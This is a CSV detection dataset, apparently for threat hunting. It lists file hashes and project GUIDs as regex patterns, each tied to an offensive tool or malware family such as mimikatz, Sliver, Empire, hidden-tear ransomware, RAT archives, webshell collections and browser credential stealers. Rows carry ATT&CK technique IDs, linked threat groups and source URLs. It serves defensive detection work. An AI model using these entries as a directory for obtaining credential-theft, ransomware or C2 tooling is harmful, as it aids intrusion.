"*c5af796b44a3d3d09e184ef622ad002b8298696c2de139392fd35898f5073527*",".{0,1000}c5af796b44a3d3d09e184ef622ad002b8298696c2de139392fd35898f5073527.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#filehash","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","37086"
"*c5b452ef4e7c5a5cd045419c94244148563d168a7d682baa622d113466e4a3ae*",".{0,1000}c5b452ef4e7c5a5cd045419c94244148563d168a7d682baa622d113466e4a3ae.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","37088"
"*c5b69369f46c94d6c1ac5c2f3808be48fa6d790c7d7d909d82850cc8774a14ac*",".{0,1000}c5b69369f46c94d6c1ac5c2f3808be48fa6d790c7d7d909d82850cc8774a14ac.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","37089"
"*c5bcfd00d0b8fda7c4b20cdc9649713d9f01dd12f61ce8ee9c45ec424a6bbdf2*",".{0,1000}c5bcfd00d0b8fda7c4b20cdc9649713d9f01dd12f61ce8ee9c45ec424a6bbdf2.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37091"
"*c5c2ca31085c518b48980da28238d622ba5bb77d0caf36bae116ad90c2a7920f*",".{0,1000}c5c2ca31085c518b48980da28238d622ba5bb77d0caf36bae116ad90c2a7920f.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","37093"
"*c5c63b3a99d3900dbeaf864cadeeff7af57fe293aae39525d4f4eb2be118e3d7*",".{0,1000}c5c63b3a99d3900dbeaf864cadeeff7af57fe293aae39525d4f4eb2be118e3d7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37094"
"*C5C6F4EA-7F09-4AC7-AC2A-1246302B9856*",".{0,1000}C5C6F4EA\-7F09\-4AC7\-AC2A\-1246302B9856.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","37095"
"*c5ca918f2d912ad4e74640d86a6f1da1845eb96f3193b71ad7eb231b0ce1d2a7*",".{0,1000}c5ca918f2d912ad4e74640d86a6f1da1845eb96f3193b71ad7eb231b0ce1d2a7.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","37097"
"*c5cb049d25fab0401c450f94a536898884681ee07c56b485ba4c6066b1dae710*",".{0,1000}c5cb049d25fab0401c450f94a536898884681ee07c56b485ba4c6066b1dae710.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37098"
"*c5cb049d25fab0401c450f94a536898884681ee07c56b485ba4c6066b1dae710*",".{0,1000}c5cb049d25fab0401c450f94a536898884681ee07c56b485ba4c6066b1dae710.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37099"
"*c5cc643b66c16b592ce71d7c985942c71494a8ee640940846d3d0578c932ad0e*",".{0,1000}c5cc643b66c16b592ce71d7c985942c71494a8ee640940846d3d0578c932ad0e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37100"
"*c5ce3e817030e3bd925c09fcd3eaacf4705dfaacad9bdec485a4f246eb726a81*",".{0,1000}c5ce3e817030e3bd925c09fcd3eaacf4705dfaacad9bdec485a4f246eb726a81.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","37101"
"*c5ced80616a473bd03777cf21da8a2126d107dea8c415a52bb5f7ea736d65306*",".{0,1000}c5ced80616a473bd03777cf21da8a2126d107dea8c415a52bb5f7ea736d65306.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37102"
"*c5d484d2c6817bbf05a900cd6bced458311b72af57d14b29421816620769f4ac*",".{0,1000}c5d484d2c6817bbf05a900cd6bced458311b72af57d14b29421816620769f4ac.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","37105"
"*c5deda524fb386a888b702d1eef8d55ad8b619affb88b2ed8bd913d24a3cde98*",".{0,1000}c5deda524fb386a888b702d1eef8d55ad8b619affb88b2ed8bd913d24a3cde98.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37106"
"*c5e2433d83689028f6985189c18eec20838211d9ed3eb04d8a244d8a08f5d12e*",".{0,1000}c5e2433d83689028f6985189c18eec20838211d9ed3eb04d8a244d8a08f5d12e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37108"
"*c5e6f5bd9b5c828645a7c77f07a4a5973a3904d2a9ae01b2cb0ad2574bf2c8d9*",".{0,1000}c5e6f5bd9b5c828645a7c77f07a4a5973a3904d2a9ae01b2cb0ad2574bf2c8d9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37110"
"*c5ed7048e6cebc2b7612053b0f0a38c0375ec30a13a46d8456ccaeba7ba33ff1*",".{0,1000}c5ed7048e6cebc2b7612053b0f0a38c0375ec30a13a46d8456ccaeba7ba33ff1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37112"
"*c5ef421298667571d96c2156513742a66190742639400dae14232e2d802470aa*",".{0,1000}c5ef421298667571d96c2156513742a66190742639400dae14232e2d802470aa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37113"
"*c5f7d585b6535e971c693b57c8a468e5cd9408da09bc91e6dabd8d3b65fe2ba2*",".{0,1000}c5f7d585b6535e971c693b57c8a468e5cd9408da09bc91e6dabd8d3b65fe2ba2.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","37114"
"*c5fcec5642fc333a1dda82ebde876d7bbe38d63a6eb54fc80bf7b9cf00fd8ae0*",".{0,1000}c5fcec5642fc333a1dda82ebde876d7bbe38d63a6eb54fc80bf7b9cf00fd8ae0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37116"
"*c5fe2c5f7455220ef30d3ed6620a2221997f6b340228a0dbad9694ffb217f232*",".{0,1000}c5fe2c5f7455220ef30d3ed6620a2221997f6b340228a0dbad9694ffb217f232.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37117"
"*c6093c8bbb01042db340ac8e538e4dd0e6074541d33281ce1c4dd256073601e6*",".{0,1000}c6093c8bbb01042db340ac8e538e4dd0e6074541d33281ce1c4dd256073601e6.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file-analysis/NmFiMjcxYjA4YzVmODg3YTNiMTRhZTc1YmZlY2UwNmU6MTcyNDUyMDAxOA==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37118"
"*c60fd707d75bddb69967290cc46c2acf53ffd76899f1cda2f88be8165a25bb1c*",".{0,1000}c60fd707d75bddb69967290cc46c2acf53ffd76899f1cda2f88be8165a25bb1c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37119"
"*c6206e0851a8c6ac7f9a9b6386a7ef7166cfbfc63d04f028cfdbe82ef523acbc*",".{0,1000}c6206e0851a8c6ac7f9a9b6386a7ef7166cfbfc63d04f028cfdbe82ef523acbc.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","#filehash","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","37120"
"*c62fd3c8190602e100681a0fc85fbffed061e3fca8d484744d5d0eb03668f661*",".{0,1000}c62fd3c8190602e100681a0fc85fbffed061e3fca8d484744d5d0eb03668f661.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37121"
"*c6306acc18cfb5cd38d33896213d4b8ba1b5f3b42e55d9dd9678bab4cbd31d54*",".{0,1000}c6306acc18cfb5cd38d33896213d4b8ba1b5f3b42e55d9dd9678bab4cbd31d54.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37122"
"*c631eda13fb95658b81e31a06554339857def299970639d8e3ee646df70d9454*",".{0,1000}c631eda13fb95658b81e31a06554339857def299970639d8e3ee646df70d9454.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37123"
"*c6323bd50315806228e24f7521ad096683beb5483bffb3eca4bbeb4f5a81d3f3*",".{0,1000}c6323bd50315806228e24f7521ad096683beb5483bffb3eca4bbeb4f5a81d3f3.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","37124"
"*c63738e628229ff8c8611bac4d15f1cd87fd58c88071765e147d1a50c56d37a2*",".{0,1000}c63738e628229ff8c8611bac4d15f1cd87fd58c88071765e147d1a50c56d37a2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37125"
"*c639d871357cbbf7fffcb59745989ae74ec836e149695568480a9a7fba1fc591*",".{0,1000}c639d871357cbbf7fffcb59745989ae74ec836e149695568480a9a7fba1fc591.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37127"
"*c63d200f9bd6313d10c66c9418104290ea09c893d7bb8c830a5da53926912464*",".{0,1000}c63d200f9bd6313d10c66c9418104290ea09c893d7bb8c830a5da53926912464.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37128"
"*c654a7ea1dc15b2c30ddeeba64c1f1fb4e7f1f53cb858a7f78ce508e2b6f259a*",".{0,1000}c654a7ea1dc15b2c30ddeeba64c1f1fb4e7f1f53cb858a7f78ce508e2b6f259a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37129"
"*c655df1762fa005766377fa896d4cd5537cfb055231e56f117479cebba1d5249*",".{0,1000}c655df1762fa005766377fa896d4cd5537cfb055231e56f117479cebba1d5249.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37130"
"*c664a81f5833fc705151ebee4e25084e6a2c7315ad1324245460aaae5ed9d065*",".{0,1000}c664a81f5833fc705151ebee4e25084e6a2c7315ad1324245460aaae5ed9d065.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","37132"
"*C666C98C-84C3-4A5A-A73B-2FC711CFCB7F*",".{0,1000}C666C98C\-84C3\-4A5A\-A73B\-2FC711CFCB7F.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#GUIDproject","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","37133"
"*C6678CDE09F4A18DD9C295262837C94E8D069295D26CE187C94C8AEDDE996CB3*",".{0,1000}C6678CDE09F4A18DD9C295262837C94E8D069295D26CE187C94C8AEDDE996CB3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37134"
"*c66a79726a52709cb4ceb004f0b2dda9d7159aa04678e002d9be27fb7d887a3c*",".{0,1000}c66a79726a52709cb4ceb004f0b2dda9d7159aa04678e002d9be27fb7d887a3c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37135"
"*c66bc18ad7289d0a5a0cf3e627566e0871cb230d6f3a2f3ede5948ebd18f2b48*",".{0,1000}c66bc18ad7289d0a5a0cf3e627566e0871cb230d6f3a2f3ede5948ebd18f2b48.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","37136"
"*c672719ea7d0abfbf7b69605b975d697afeb5cad770e9cb68e57ee18d7e598d1*",".{0,1000}c672719ea7d0abfbf7b69605b975d697afeb5cad770e9cb68e57ee18d7e598d1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37139"
